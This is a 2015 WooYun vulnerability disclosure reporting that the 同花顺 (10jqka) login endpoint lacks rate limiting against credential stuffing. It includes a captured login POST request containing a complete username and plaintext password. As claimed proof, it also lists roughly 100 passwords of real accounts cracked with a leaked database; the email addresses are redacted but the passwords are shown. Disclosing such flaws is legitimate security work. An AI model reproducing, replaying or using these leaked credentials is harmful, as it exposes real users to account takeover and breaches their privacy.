当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113364

漏洞标题:同花顺某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商:同花顺

漏洞作者: 路人甲

提交时间:2015-05-11 10:26

修复时间:2015-05-16 10:28

公开时间:2015-05-16 10:28

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库泄露用户隐私

详细说明:

求审核下5号的漏洞~~~
主站登陆登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号。 登录接口抓包如下:

POST /login HTTP/1.1
Host: pass.10jqka.com.cn
Content-Length: 60
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.10jqka.com.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.10jqka.com.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie:
RA-Ver: 2.10.3
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
Connection: close
uname=569225845@qq%2ecom&passwd=dslak364075&act=login_submit

漏洞证明:

经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号.

[email protected]	xuqingyu
[email protected] michael202
[email protected] 2968506sch
[email protected] 123zhang123
[email protected] 591771abcd
[email protected] tcchengs
[email protected] 19861202
[email protected] 198211
[email protected] 16881688
[email protected] hobbygood
[email protected] 32201937
[email protected] da811001
[email protected] 981913214270
[email protected] lxr4renxian7
[email protected] zh0uzh0u
[email protected] bluesky
[email protected] 2080346680
[email protected] liuwei66
[email protected] 147369991
[email protected] 111111
[email protected] 35986137
[email protected] smart1010
[email protected] 697542
[email protected] zzzzzz
[email protected] 2144411le
[email protected] qibing83
[email protected] zzz1210123
[email protected] terminal
[email protected] 19831220
[email protected] 81030400
[email protected] wangdong
[email protected] 123456
[email protected] 1420191988
[email protected] kit646497
[email protected] 51975197
[email protected] weblogic
[email protected] LKY811007
[email protected] xh159753
[email protected] woshitjm
[email protected] 19741209
[email protected] 54051298
[email protected] fei527520
[email protected] 110119qq
[email protected] wy2152378
[email protected] 080200305
[email protected] czcfdlkj
[email protected] aaaaaaaa
[email protected] miaosoft
[email protected] 111111
[email protected] 32788646
[email protected] Swhy920520
[email protected] 123456789
[email protected] shmily0103
[email protected] lijuan0526
[email protected] 19870513
[email protected] gaofeng218
[email protected] iloveyou
[email protected] sunch521
[email protected] 98712105
[email protected] kissblack
[email protected] 90269084
[email protected] aaa3522635
[email protected] 5808177024
[email protected] 19831105
[email protected] 25894594
[email protected] zhuangdong
[email protected] liubo777
[email protected] lcl9abq1
[email protected] 87422030
[email protected] 73366227
[email protected] hsb123569
[email protected] jccg1000
[email protected] 790915
[email protected] 845169se
[email protected] 89215439
[email protected] linjinen
[email protected] nimamade
[email protected] 375884312
[email protected] 52013142002
[email protected] 111213lr
[email protected] fumuhaizi
[email protected] q1w2e3r4
[email protected] abc123123
[email protected] bullshit
[email protected] adminkid
[email protected] gq864200
[email protected] zj840728
[email protected] sscyu777
[email protected] dslak364075
[email protected] 86532956
[email protected] ad51241133
[email protected] chai12345
[email protected] 19741214
[email protected] iamcesar
[email protected] tan1978
[email protected] 86874724
[email protected] 0123456789


屏幕快照 2015-05-11 上午9.59.16.png

修复方案:

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-16 10:28

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无